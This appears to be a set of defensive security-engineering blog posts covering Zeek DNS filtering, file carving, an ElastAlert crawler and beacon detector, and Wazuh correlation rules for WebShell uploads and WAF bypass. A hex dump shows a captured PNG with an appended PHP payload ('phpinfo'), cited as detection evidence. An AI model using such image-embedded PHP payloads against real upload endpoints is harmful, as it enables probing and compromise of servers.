"unique_ua": session_data[self.user_agent].unique().shape[0],
"alert": False,
}

df = query_data[query_data['args_hash'] == i]
count_args_length = df['max_length'].iloc[0]
if count_args_length > self.MAX_ARGS_LENGTH:
continue

total_hits = df.shape[0]
if total_hits < self.MIN_HITS:
continue

args_list = df['args_list'].iloc[0]
for i in args_list:
unique_args = len(df[i].unique())
if unique_args == 1:
continue

# Calculate the percentage based on the number of changes in the parameters
current_percent = int((unique_args / total_hits) * 100)
if current_percent < self.THRESHOLD_PERCENT:
continue

result['detail']['percent'][i] = current_percent
result['detail']['unique'][i] = unique_args

# Number of parameters with changes
count_unique_args = len(result['detail']['unique'])
if count_unique_args <= self.MAX_UNIQUE_ARGS:
result['alert'] = True

if not result['detail']['unique']:
continue

# Beacon analysis
if self.beacon_module:
result['beacon'] = self.find_beacon(
session_data.reset_index(drop=True))

result['args_list'] = args_list
result['total_hits'] = total_hits
result['url_sample'] = df['url_sample'].iloc[0]
result['period'] = self.PERIOD

if result['alert']:
result['tags'].append('enumerate')

if result['beacon']:
result['tags'].append('beacon')

if result['unique_ua'] >= self.UA_PROCESSES:
result['tags'].append('suspicious-ua')

self.l_list.acquire()
spider_list.append(result)
self.l_list.release()
q_job.task_done()

def find_spiders(self):
if self.df.empty:
raise Exception(
"Elasticsearch did not retrieve any data. Please ensure your settings are correct inside the config file.")

tqdm.pandas(desc="Detection of Spider Crawlers.")

# get url_path
self.df[self.url_path] = self.df[self.url].str.split('?').str.get(0)

# add session_id from hash fields
self.df['session_id'] = self.df[self.fields['hash']
].progress_apply(lambda row: hash(tuple(row)), axis=1)
# split url
self.df = self.df[self.df[self.url].apply(lambda request: True if len(
request.split('?')) == 2 else False)].reset_index(drop=True)
# normalized url
self.df[self.url] = self.df[self.url].apply(
lambda request: html.unescape(request))
# unique session_id
unique_session = self.df['session_id'].unique()

for session in unique_session:
self.q_job.put(session)

mgr = Manager()
spider_list = mgr.list()
processes = [Process(target=self.find_spider, args=(
self.q_job, spider_list,)) for thread in range(self.NUM_PROCESSES)]

# Run processes
for p in processes:
p.start()

# Exit the completed processes
for p in processes:
p.join()

results = pd.DataFrame(list(spider_list))

# add timestamp
now = datetime.datetime.now().isoformat()
results['timestamp'] = now

if not results.empty:
results = results[results['alert'] == True]

match_log = "Queried rule %s matches %s crawl events" % (
self.rules['name'],
results.shape[0]
)
elastalert_logger.info(match_log)

return results

Configuration file
  • Web.yaml
name: "Detection of Spider Crawlers"
es_host: "es_server"
es_port: 9200
type: "elastalert_modules.spider.my_rules.SpiderRule"

index: "zeek-other-%Y.%m.%d"
use_strftime_index: true

filter:
- term:
host: "canon88.github.io"
- term:
method.keyword: "GET"

include: ["true_client_ip", "host", "uri", "uri_path", "user_agent"]

timestamp:
format: false
timestamp_field: "@timestamp"

buffer_time:
hours: 12

run_every:
minutes: 10

max_query_size: 10000
scroll: true

beacon:
max_args_length: 10 # maximum number of parameters to inspect
min_hits: 120 # minimum number of matching events
max_unique_args: 2 # maximum number of parameters allowed to vary
threshold_percent: 70 # request-ratio threshold (percent)
threads: 16 # number of worker processes
beacon_module: true # enable periodicity detection
min_interval: 1 # minimum interval (seconds)
window: 2 # jitter window
user_agent: 20 # unique User-Agent threshold

field:
true_client_ip:
alias: src_ip
type: [hash]
host:
alias: http_host
type: [hash]
uri_path:
alias: url_path
type: [hash]
uri:
alias: url
user_agent:
alias: user_agent

output:
json:
enable: yes # write results to a local file
path: /var/log/spider/spider_detect.json
redis:
enable: no # push results to Redis for threat-intelligence triage
host: redis_server
port: 6379
db: 0
password: redis_password
key: spider:feeds
field: src_ip

alert:
- debug

Alert output
{
"detail": {
"percent": {
"cookieid": 81
},
"unique": {
"cookieid": 133
}
},
"tags": [
"enumerate", // 存在参数遍历行为
"suspicious-ua" // user_agent 超过阈值
],
"src_ip": "54.160.169.250",
"url_path": "/image/cookieId.html",
"http_host": "canon88.github.io",
"unique_ua": 47,
"alert": true,
"beacon": {},
"args_list": [
"cookieid"
],
"total_hits": 164,
"url_sample": "/image/cookieId.html?cookieid=E99A3E54-5A81-2907-1372-339FFB70A464",
"period": "1:00",
"timestamp": "2020-06-02T11:07:59.276581"
}
Summary

find_spider: detects parameter-enumeration behavior; find_beacon is added on top to contribute a periodicity dimension. Many crawlers come with built-in timing jitter and use crawler pools, though, so the effect is not especially pronounced.

find_beacon: better suited to detecting C2 connections, e.g. periodic requests for a DNS domain. Here is an alert it produced for a periodic domain request (a simplified illustration of the periodicity check follows the sample):

{
"src_ip": "x.x.x.228",
"hostname": "entitlement.service.imperva.com",
"answers": [
"joxkwsf.x.incapdns.net",
"45.60.73.51"
],
"percent": "100",
"interval": 1800,
"occurrences": 23,
"timestamp": "2020-06-01T08:03:38.164363",
"period": 12,
"event_type": "beaconing",
"num_hits": 806379,
"num_matches": 3,
"kibana_url": "https://canon88.github.io/goto/5f089bcc411426b854da71b9062fdc8c"
}
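
As promised above, a simplified illustration of the periodicity check: count inter-arrival deltas and see what share of events falls inside a small window around the dominant interval. This is a stripped-down version of the percent_grouping idea with made-up timestamps, not the exact ElastAlert rule logic.

```python
from collections import Counter

timestamps = [0, 1800, 3600, 5400, 7201, 9001, 10801]          # hypothetical epoch seconds
deltas = [b - a for a, b in zip(timestamps, timestamps[1:])]   # [1800, 1800, 1800, 1801, 1800, 1800]
counts = Counter(deltas)

window = 2                                                     # same idea as the "window" setting
top = counts.most_common(1)[0][0]
in_window = sum(c for d, c in counts.items() if abs(d - top) <= window)
percent = 100 * in_window / len(deltas)
print(top, percent)   # 1800 100.0 -> a strong ~30-minute beacon, well above threshold_percent
```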

image-20200603113849810

Summary

​ Within 1 hour, IP 54.160.169.250 accessed the endpoint 164 times, changed the cookieid parameter 133 times (81% of all requests), and rotated through 47 different user_agent values.
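
The numbers line up with the thresholds set in Web.yaml, which is a quick way to double-check why the rule fired:

```python
total_hits = 164          # > min_hits (120)
unique_cookieid = 133
print(int(unique_cookieid / total_hits * 100))  # 81 -> above threshold_percent (70), so "enumerate"
print(47 >= 20)                                 # unique_ua 47 >= user_agent threshold (20) -> "suspicious-ua"
```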

image-20200602114610615

References

Flare

ElastAlert

Background

  1. In the local environment, two NTA (Suricata) servers receive traffic from 12 internal DNS servers in order to find security issues in DNS requests. Recently the Suricata process on both servers began restarting automatically after roughly 10 hours of running; the logs said, in essence, that memory was exhausted and a forced restart was needed to free it. Pinning this down took some time. DNS packets are small and the average traffic here is only about 25 Mbps, so oversized NIC traffic was unlikely to be the cause. Digging further: our application servers call each other's APIs via internal domain names, so the DNS request volume is huge. Kibana showed 320,000,000-350,000,000 dns_type: query events per day (and that is only dns_type: query; the dns_type: answer volume is also enormous). Suricata cannot filter specific domains before writing its output, which frankly deserves a complaint. The workaround at the time was to keep only dns_type: query events, which kept Suricata running and temporarily met the need.

  2. Recently one of the site's upload endpoints received jpg and png files containing malicious payloads. Suricata did detect them, but it raised new requirements: how to tell whether a file was uploaded successfully, and how to carve the file and extract its hash. Suricata can do both, but with a notable drawback: once file_info is enabled it extracts hashes for every protocol that supports file extraction. As an e-commerce site with heavy external traffic, even the HTML pages users visit get a hash computed, and that volume is terrifying; Suricata offers no filtering for this by default.

Summary: for the two problems above, what I need is a more flexible NTA framework. Enter the protagonist of this post - Zeek.


Requirements

  1. Filter out internal DNS domains and keep only requests and responses for external domains;
  2. More flexible file carving and hash extraction;

Implementation

1. Filtering local DNS requests
DNS script

dns-filter_external.zeek

redef Site::local_zones = {"canon88.github.io", "baidu.com", "google.com"};

function dns_filter(rec: DNS::Info): bool
{
return ! Site::is_local_name(rec$query);
}

redef Analyzer::disable_all = T;

event zeek_init()
{
Analyzer::enable_analyzer(Analyzer::ANALYZER_VXLAN);
Analyzer::enable_analyzer(Analyzer::ANALYZER_DNS);
Log::remove_default_filter(DNS::LOG);
local filter: Log::Filter = [$name="dns_split", $path="/data/logs/zeek/dns_remotezone", $pred=dns_filter];
Log::add_filter(DNS::LOG, filter);
}
Script summary:
  1. Site::local_zones defines the internal domains, which are the ones we want to filter out by default. In my case these are mostly intranet domains;
  2. Optimize performance by enabling only DNS parsing. These two NTA boxes only parse DNS traffic, and to keep signature-based detection on domains I let Suricata and Zeek coexist (Zeek can do signature detection too, I was just lazy). Analyzer::enable_analyzer(Analyzer::ANALYZER_DNS); restricts analysis to DNS traffic;
  3. Filter the log and write it out;
Log sample:
{
"ts": 1589175829.994196,
"uid": "CPRxOZ2RtkPYhjz8R9",
"id.orig_h": "1.1.1.1",
"id.orig_p": 40411,
"id.resp_h": "2.2.2.2",
"id.resp_p": 53,
"proto": "udp",
"trans_id": 696,
"rtt": 1.3113021850585938e-05,
"query": "graph.facebook.com",
"qclass": 1,
"qclass_name": "C_INTERNET",
"qtype": 1,
"qtype_name": "A",
"rcode": 0,
"rcode_name": "NOERROR",
"AA": false,
"TC": false,
"RD": true,
"RA": true,
"Z": 0,
"answers": [
"api.facebook.com",
"star.c10r.facebook.com",
"157.240.22.19"
],
"TTLs": [
540,
770,
54
],
"rejected": false,
"event_type": "dns"
}
Summary:

After Zeek started filtering DNS requests, the daily DNS volume is now 6,300,000-6,800,000 events/day (query + answer), compared with 320,000,000-350,000,000/day (query only) before. The reduction is dramatic, and it also relieves the storage pressure on the backend ES cluster.

  • Zeek DNS (query + answer)

image-20200511135508651

  • Suricata DNS (query)

image-20200511140015791


2. More flexible file carving and hash extraction
File extraction script

file_extraction.zeek

This is a demo script; the syntax is not particularly elegant, so don't fret over it.

@load base/frameworks/files/main
@load base/protocols/http/main

module Files;

export {
redef record Info += {
hostname: string &log &optional;
proxied: set[string] &log &optional;
url: string &log &optional;
method: string &log &optional;
true_client_ip: string &log &optional;
logs: bool &log &optional;
};

option http_info = T;
}

redef FileExtract::prefix = "/data/logs/zeek/extracted_files/";

global mime_to_ext: table[string] of string = {
["text/plain"] = "txt",
["application/x-executable"] = "",
["application/x-dosexec"] = "exe",
["image/jpeg"] = "jpg",
["image/png"] = "png",
["application/pdf"] = "pdf",
["application/java-archive"] = "jar",
["application/x-java-applet"] = "jar",
["application/x-java-jnlp-file"] = "jnlp",
["application/msword"] = "doc",
["application/vnd.openxmlformats-officedocument.wordprocessingml.document"] = "docs",
["application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"] = "xlsx",
["application/vnd.openxmlformats-officedocument.presentationml.presentation"] = "pptx",
};

global file_analyzer: table[string] of bool = {
["Extraction"] = T,
};

global http_method: set[string] = {
"GET",
"POST",
};

global http_hostname: set[string] = {
"canon88.github.io",
};

global http_uri: set[string] = {
"/index.php",
"/account.php",
};

function files_filter(rec: Files::Info): bool
{
return rec?$logs;
}

event zeek_init()
{
Log::remove_default_filter(Files::LOG);
local filter: Log::Filter = [$name="file_extraction", $path="/data/logs/zeek/file_extraction", $pred=files_filter];
Log::add_filter(Files::LOG, filter);
}

event file_sniff(f: fa_file, meta: fa_metadata) &priority=3
{
if ( f$source != "HTTP" )
return;

if ( ! f$http?$method )
return;

if ( f$http$method !in http_method )
return;

if ( ! f$http?$host )
return;

if ( f$http$host !in http_hostname )
return;

if ( ! meta?$mime_type )
return;

if ( meta$mime_type !in mime_to_ext )
return;

f$info$logs = T;

if ( file_analyzer["Extraction"] )
{
local fname = fmt("%s-%s.%s", f$source, f$id, mime_to_ext[meta$mime_type]);
Files::add_analyzer(f, Files::ANALYZER_EXTRACT, [$extract_filename=fname]);
}

Files::add_analyzer(f, Files::ANALYZER_MD5);

if ( http_info )
{
if ( f$http?$host )
f$info$hostname = f$http$host;
if ( f$http?$proxied )
f$info$proxied = f$http$proxied;
if ( f$http?$method )
f$info$method = f$http$method;
if ( f$http?$uri )
f$info$url = f$http$uri;
if ( f$http?$true_client_ip )
f$info$true_client_ip = f$http$true_client_ip;
}
}


event file_state_remove(f: fa_file)
{
if ( !f$info?$extracted || !f$info?$md5 || FileExtract::prefix == "" || !f$info?$logs )
return;

local orig = f$info$extracted;
local split_orig = split_string(f$info$extracted, /\./);
local extension = split_orig[|split_orig|-1];
local ntime = fmt("%D", network_time());
local ndate = sub_bytes(ntime, 1, 10);
local dest_dir = fmt("%s%s", FileExtract::prefix, ndate);
mkdir(dest_dir);
local dest = fmt("%s/%s.%s", dest_dir, f$info$md5, extension);
local cmd = fmt("mv %s/%s %s", FileExtract::prefix, orig, dest);
when ( local result = Exec::run([$cmd=cmd]) )
{

}
f$info$extracted = dest;
}
Script summary:
 1. Supports hash extraction and file carving filtered by hostname, method, url, and file type;
 2. By default carved files are stored in per-day directories and renamed to their MD5 hash;
 3. The file log is enriched with HTTP-related fields;
Log sample
{
"ts": 1588891497.173108,
"fuid": "FhOGNc2zDdlF3AP5c",
"tx_hosts": [
"1.1.1.1"
],
"rx_hosts": [
"2.2.2.2"
],
"conn_uids": [
"CItQs61wvvtPqSB0Ub"
],
"source": "HTTP",
"depth": 0,
"analyzers": [
"MD5",
"SHA1",
"EXTRACT"
],
"mime_type": "image/png",
"duration": 0,
"local_orig": true,
"is_orig": false,
"seen_bytes": 353,
"total_bytes": 353,
"missing_bytes": 0,
"overflow_bytes": 0,
"timedout": false,
"md5": "fd0229d400049449084b3864359c445a",
"sha1": "d836d3f06c0fc075cf0f5d95f50b79cac1dac97d",
"extracted": "/data/logs/zeek/extracted_files/2020-05-07/fd0229d400049449084b3864359c445a.png",
"extracted_cutoff": false,
"hostname": "canon88.github.io",
"proxied": [
"TRUE-CLIENT-IP -> 3.3.3.3",
"X-FORWARDED-FOR -> 4.4.4.4"
],
"url": "/image/close.png",
"method": "GET",
"true_client_ip": "3.3.3.3",
"logs": true
}
File carving

Here is one of the carved images that contained a malicious payload

image-20200511150738194

$ ll /data/logs/zeek/extracted_files/
total 89916
drwxr-xr-x 10 root root 150 May 11 06:14 ./
drwxr-xr-x 4 root root 67 May 11 06:00 ../
drwxr-xr-x 2 root root 50 May 5 07:54 2020-05-04/
drwxr-xr-x 2 root root 4096 May 5 23:51 2020-05-05/
drwxr-xr-x 2 root root 671744 May 6 23:41 2020-05-06/
drwxr-xr-x 2 root root 4096 May 7 22:44 2020-05-07/
drwxr-xr-x 2 root root 741376 May 8 23:59 2020-05-08/
drwxr-xr-x 2 root root 23425024 May 9 23:59 2020-05-09/
drwxr-xr-x 2 root root 25047040 May 10 23:59 2020-05-10/
drwxr-xr-x 2 root root 24846336 May 11 06:14 2020-05-11/

$ xxd /data/logs/zeek/extracted_files/2020-05-07/884d9474180e5b49f851643cb2442bce.jpg
00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452 .PNG........IHDR
00000010: 0000 003c 0000 003c 0806 0000 003a fcd9 ...<...<.....:..
00000020: 7200 0000 1974 4558 7453 6f66 7477 6172 r....tEXtSoftwar
00000030: 6500 4164 6f62 6520 496d 6167 6552 6561 e.Adobe ImageRea
00000040: 6479 71c9 653c 0000 0320 6954 5874 584d dyq.e<... iTXtXM
00000050: 4c3a 636f 6d2e 6164 6f62 652e 786d 7000 L:com.adobe.xmp.
..........
00001030: 8916 ce5f 7480 2f38 c073 69f1 5c14 83fb ..._t./8.si.\...
00001040: aa9d 42a3 8f4b ff05 e012 e04b 802f 01be ..B..K.....K./..
00001050: 04b8 91c7 ff04 1800 bcae 819f d1da 1896 ................
00001060: 0000 0000 4945 4e44 ae42 6082 3c3f 7068 ....IEND.B`.<?ph
00001070: 7020 7068 7069 6e66 6f28 293b 3f3e 1a p phpinfo();?>.
Summary:

With this Zeek script extension you can pull hashes for whatever file types you want and customize file carving as you see fit.

Brainstorming

Once the hash of an uploaded file is available, two further security events can be derived:

  1. Determine whether the file upload succeeded.

    Usually the first thing to establish is whether the upload actually landed; if it did, a corresponding event should be raised. Here we can correlate with file-creation events from a HIDS.

  2. Correlate with antivirus engines / threat intelligence.

    Take the hash from the event correlated above and look it up, most commonly by submitting it to VT or a threat-intelligence service.

Taking Wazuh as an example, Zeek's file-carving events are correlated with Wazuh's new-file events, using the hash as the correlation key (a sketch of such a hash lookup follows the two sample events below).

a. Zeek event

{
"ts": 1589158812.471443,
"fuid": "FBkqzM2AFg0jrioji6",
"tx_hosts": [
"1.1.1.1"
],
"rx_hosts": [
"2.2.2.2"
],
"conn_uids": [
"CcOyQo2ziEuoLBNIb9"
],
"source": "HTTP",
"depth": 0,
"analyzers": [
"SHA1",
"EXTRACT",
"MD5",
"DATA_EVENT"
],
"mime_type": "text/plain",
"duration": 0,
"local_orig": true,
"is_orig": true,
"seen_bytes": 31,
"total_bytes": 31,
"missing_bytes": 0,
"overflow_bytes": 0,
"timedout": false,
"md5": "37a74f452f1c49854a2951fd605687c5",
"extracted": "/data/logs/zeek/extracted_files/2020-05-11/37a74f452f1c49854a2951fd605687c5.txt",
"extracted_cutoff": false,
"hostname": "canon88.github.io",
"proxied": [
"X-FORWARDED-FOR -> 3.3.3.3",
"TRUE-CLIENT-IP -> 4.4.4.4"
],
"url": "/index.php",
"method": "POST",
"true_client_ip": "4.4.4.4",
"logs": true
}

b. Wazuh event

image-20200511144805354
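
A hedged sketch of the hash-based correlation idea: given the md5 from the Zeek file-carving event above, look for a Wazuh syscheck event carrying the same hash. The connection settings mirror the reindex snippet elsewhere in this post; the index pattern and the syscheck.md5_after field path are assumptions about the deployed mapping.

```python
from elasticsearch import Elasticsearch

es = Elasticsearch(['es_host1'], port=9200, http_auth=('elastic', 'hello world'),
                   use_ssl=True, verify_certs=True, ca_certs='/opt/certs/ca/ca.crt')

md5 = "37a74f452f1c49854a2951fd605687c5"
query = {"query": {"term": {"syscheck.md5_after": md5}}, "size": 10}
hits = es.search(index="wazuh-alerts-3.x-*", body=query)["hits"]["hits"]
print("file landed on disk" if hits else "no matching syscheck event yet")
```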

References

reindex

from elasticsearch import Elasticsearch
from elasticsearch import helpers

host = ['es_host1', 'es_host2', 'es_host3']
port = 9200
timeout = 600
auth_user = 'elastic'
auth_password = 'hello world'
use_ssl = True
ca_certs = '/opt/certs/ca/ca.crt'

es = Elasticsearch(host, port=port, timeout=timeout, http_auth=(auth_user, auth_password), verify_certs=True, use_ssl=use_ssl, ca_certs=ca_certs)
Reindex for the specified date range
import datetime
import time

begin_date = (datetime.datetime.now() - datetime.timedelta(days = 10)).strftime("%Y.%m.%d")
begin_date = datetime.datetime.strptime(begin_date, "%Y.%m.%d")
end_date = (datetime.datetime.now() - datetime.timedelta(days = 1)).strftime("%Y.%m.%d")
end_date = datetime.datetime.strptime(end_date, "%Y.%m.%d")

date_list = []
while begin_date <= end_date:
date_str = begin_date.strftime("%Y.%m.%d")
date_list.append(date_str)
begin_date += datetime.timedelta(days=1)
date_list
['2020.03.19',
'2020.03.20',
'2020.03.21',
'2020.03.22',
'2020.03.23',
'2020.03.24',
'2020.03.25',
'2020.03.26',
'2020.03.27',
'2020.03.28']
chunk_size = 10000
for day in date_list:
source_index = 'wazuh-alerts-3.x-' + day
target_index = 'siem-alerts-' + day
helpers.reindex(
client=es, source_index=source_index, target_index=target_index,
target_client=es, chunk_size=chunk_size
)
print(source_index + ' -> ' + target_index + ' fin.')

Foreword

​ This is not some cutting-edge architecture or technology, just my own attempt to integrate the resources currently at hand at work. There are of course many ways to meet these requirements: with budget, consider Splunk; without budget but with an engineering team, go with Flink or Esper.

Requirements

​ As the attack-defense contest escalates, a single data source is rarely enough to assert whether an attack succeeded. We therefore need to correlate security events across multiple data sources and distill higher-confidence alarms for manual triage. For example: for WebShell uploads, correlate network traffic with endpoint data; for Web attacks, correlate WAF and NIDS events to produce "bypassed the WAF" alarms.

Approach

​ Although Wazuh can correlate security events on its own, in the traditional deployment the Wazuh Agent sends events to the Wazuh Manager, which performs the correlation and alerting. Without an ETL step, the Wazuh Manager struggles to correlate heterogeneous data. So we normalize the data with Logstash and forward the normalized events to the Wazuh Manager over syslog, which makes cross-source correlation possible.

Pitfalls
  1. This rework sends data to the Wazuh Manager over syslog for correlation. Syslog defaults to UDP, and oversized messages get truncated and raise errors; switch to TCP to avoid this.
  2. Some Wazuh Manager alerts lack the "necessary" correlation fields. For example, syscheck alerts in this scenario do not carry a srcip field by default; this can be solved with a preprocessing script on the Manager.

Rework

  1. Before:

    Suricata (Wazuh agent) —(Agent: UDP 1514)—> Wazuh Manager

  2. After:

    All normalization is done by Logstash; Filebeat only has to do "dumb" forwarding.

workflow:

image-20200303215020561


Filebeat configuration
  • filebeat.yaml
#=========================== Filebeat inputs =============================
filebeat.inputs:
- type: log
paths:
- "/var/log/suricata/alert-*.json"
fields_under_root: true
fields: { application: suricata }
json.keys_under_root: true
json.overwrite_keys: true
json.message_key: log
tail_files: false

scan_frequency: 1s
harvester_buffer_size: 104857600
backoff: 1s
max_backoff: 10s
close_timeout: 30m
close_inactive: 10m
clean_inactive: 72h
ignore_older: 70h
registry_file: /etc/filebeat/registry/wazuh/

#================================ Processors ==================================
processors:
- drop_fields:
fields: ["ecs.version", "agent.ephemeral_id", "agent.version", "agent.type", "agent.id", "agent.ephemeral_id", "input.type"]

#================================ Outputs =====================================
output.logstash:
hosts: ["logstash:5010"]
loadbalance: true
worker: 4
compression_level: 3
bulk_max_size: 4096

Logstash configuration
  • 00_input.conf
input {
beats {
port => 5010
codec => "json_lines"
tags => ["beats"]
}
}
  • 50_suricata.conf
filter {
if [application] == "suricata" {
date {
match => [ "timestamp", "ISO8601" ]
target => "timestamp"
}
}
}
  • mapping.json
{
"common_mapping": {
"src_ip": "srcip",
"dest_ip": "dstip",
"src_port": "srcport",
"dest_port": "dstport"
}
}
  • 70_normalized-suricata.conf
filter {
clone {
clones => [ "siem_events" ]
}
}

filter {
if [type] == "siem_events" {
mutate {
remove_field => [ "application", "type", "agent", "@version", "@timestamp"]
add_field => {
"provider" => "Suricata"
"product" => "Intrusion Detection System"
}
}

ruby {
init => "
require 'json'

mapping_json = File.read('/etc/logstash/mappings/wazuh/mapping.json')
mapping = JSON.parse(mapping_json)
@common_mapping = mapping['common_mapping']
"

code => "
keys = event.to_hash.keys
keys.each do |key|
if @common_mapping.include? key then
value = event.get(key)
event.remove(key)
new_key = @common_mapping[key]
event.set(new_key, value)
end
end

sensor = event.get('[host][name]')
event.set('sensor', sensor)
"
}
}
}
  • 99_output-elasticsearch.conf
output {
if [event_type] == "alert" {
elasticsearch {
cacert => "/etc/logstash/certs/ca/ca.crt"
user => "elastic"
password => "Hello World!"
hosts => ["https://elasticsearch:9200"]
index => "suricata-%{+YYYY.MM.dd}"
template => "/etc/logstash/index-template.d/suricata-template.json"
template_name => "suricata"
template_overwrite => true
}
}
}
  • 99_output-wazuh.conf
output {
if [provider] == "Suricata" {
syslog {
host => "wazuh"
protocol => "tcp"
port => 514
codec => "json"
sourcehost => "logstash"
appname => "NORMALIZED"
}
#stdout {
#codec => rubydebug
#}
}
}

Wazuh configuration
  • custom-syscheck.py

    A preprocessing script added on the Wazuh Manager to preprocess specified security events, e.g. adding a srcip field to syscheck events.

import json
import sys
import time
import os
from datetime import datetime, timedelta, timezone

# ossec.conf configuration:
# <integration>
# <name>custom-syscheck</name>
# <rule_id>554</rule_id>
# <group>syscheck</group>
# <alert_format>json</alert_format>
# </integration>

# Global vars
debug_enabled = False
pwd = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))
json_alert = {}
now = time.strftime("%a %b %d %H:%M:%S %Z %Y")
wazuh_server = "192.168.199.97"

# Set paths
log_file = '{0}/logs/integrations.log'.format(pwd)
syscheck_file = '{0}/logs/syscheck.json'.format(pwd)

def iso8601(hours=8):
td = timedelta(hours=hours)
tz = timezone(td)
return datetime.now(tz=tz).isoformat()

def main(args):
debug("# Starting")

# Read args
alert_file_location = args[1]

debug("# File location")
debug(alert_file_location)

# Load alert. Parse JSON object.
with open(alert_file_location) as alert_file:
json_alert = json.load(alert_file)
debug("# Processing alert")
debug(json_alert)

alert = normalized_data(json_alert)
with open(syscheck_file, 'a') as f:
msg = json.dumps(alert)
f.write(msg + '\n')

def debug(msg):
if debug_enabled:
msg = "{0}: {1}\n".format(now, msg)
with open(log_file, "a") as f:
f.write(msg)

def normalized_data(alert):
if alert['agent']['id'] == '000':
alert['srcip'] = wazuh_server
elif alert['agent'].get('ip'):
alert['srcip'] = alert['agent']['ip']
alert['dstip'] = alert['agent']['ip']
alert['integration'] = 'custom-syscheck'
alert['create_timestamp'] = iso8601()
debug(alert)
return(alert)

if __name__ == "__main__":
try:
# Read arguments
bad_arguments = False
if len(sys.argv) >= 4:
msg = '{0} {1} {2} {3} {4}'.format(now, sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4] if len(sys.argv) > 4 else '')
else:
msg = '{0} Wrong arguments'.format(now)
bad_arguments = True

# Logging the call
with open(log_file, 'a') as f:
f.write(msg + '\n')

if bad_arguments:
debug("# Exiting: Bad arguments.")
sys.exit(1)

# Main function
main(sys.argv)

except Exception as e:
debug(str(e))
raise
  • ossec.conf
    • Configure syslog to use TCP;
    • Load the preprocessing script;
    • Ingest the log file the script writes;
<ossec_config>
<remote>
<connection>syslog</connection>
<port>514</port>
<protocol>tcp</protocol> <!-- udp(default)/tcp -->
<allowed-ips>192.168.199.0/24</allowed-ips>
</remote>

<!-- Custom external Integration -->
<integration>
<name>custom-syscheck</name>
<rule_id>554</rule_id>
<group>syscheck</group>
<alert_format>json</alert_format>
</integration>

<!-- Custom syscheck.json -->
<localfile>
<log_format>json</log_format>
<location>/var/ossec/logs/syscheck.json</location>
</localfile>
</ossec_config>
  • local_decoder_normalized.xml

Sample

<!--
2020 Mar 03 02:53:39 logstash NORMALIZED[-]: {"timestamp":"2020-02-21T19:47:04.382300+0800","flow_id":1133835979634527,"in_iface":"wlp3s0","event_type":"alert","src_ip":"192.168.199.97","src_port":60022,"dest_ip":"192.168.199.162","dest_port":59143,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":123456,"rev":1,"signature":"LOCAL RULES XXX","severity":3}}
-->

<decoder name="nta_json">
<prematch>NORMALIZED[-]: </prematch>
<plugin_decoder offset="after_prematch">JSON_Decoder</plugin_decoder>
</decoder>
  • 0901-local_raw.xml
    • The decoder referenced by default is json; change it to the newly added nta_json;
    • Override the original rule with overwrite="yes";
<group name="suricata,">

<!-- /var/ossec/ruleset/rules/0475-suricata_rules.xml -->
<!-- Defind Suricata Rules -->
<!-- ID: 86600 - 86699 -->

<rule id="86600" level="0" overwrite="yes">
<decoded_as>nta_json</decoded_as>
<field name="timestamp">\.+</field>
<field name="event_type">\.+</field>
<description>Suricata messages.</description>
<options>no_full_log</options>
</rule>

</group>
  • 0905-local_syscheck.xml

    Parses the log generated by the preprocessing script

<group name="syscheck,">
<rule id="187100" level="7">
<decoded_as>json</decoded_as>
<field name="integration">custom-syscheck</field>
<description>syscheck integration messages.</description>
<options>no_full_log</options>
</rule>
</group>
  • 9999-local_composite.xml
<group name="local,composite,">

<!-- Local Composite Rules Range ID: 200000 - 205000 -->

<rule id="200000" level="15" frequency="2" timeframe="600">
<if_matched_sid>101000</if_matched_sid> <!-- file-upload rules / WebShell-upload detection rules -->
<if_sid>187100</if_sid>
<same_source_ip /> <!-- correlate by source IP -->
<description>Phase 3: WebShell upload detected on server $(srcip).</description>
<options>no_full_log</options>
</rule>

<rule id="200001" level="12" frequency="2" timeframe="600">
<if_matched_sid>88801</if_matched_sid> <!-- WAF security events -->
<if_group>ids</if_group>
<same_source_ip />
<description>Phase 3: Alarm - Same ip Bypass WAF of within 600 seconds. $(srcip) -> $(http.hostname) -> $(alert.signature) -> $(alert.signature_id).</description>
<options>no_full_log</options>
</rule>

</group>

Summary

  1. For correlated WebShell detection we currently rely on same source IP plus time ordering; the most reliable signal would be hash comparison. I have to complain about Suricata's default fileinfo here: its output cannot be customized, and once a protocol that supports file extraction is enabled it emits fileinfo events for everything, so at high volume the Wazuh engine comes under real pressure. I tried defining a custom file-audit event with Lua, but it likewise seems unable to distinguish protocols, let alone filter its output on HTTP conditions.

  2. Correlation rules raise confidence by tying together multiple underlying security events, so inaccurate underlying events will also flood the higher-level rules with false positives. Tuning the underlying events has to be an ongoing effort.

  3. When Wazuh v3.11.4 receives large logs over syslog it triggers a memory violation that restarts the ossec-remoted process; this has been reported to the community and will be fixed in the next release.

References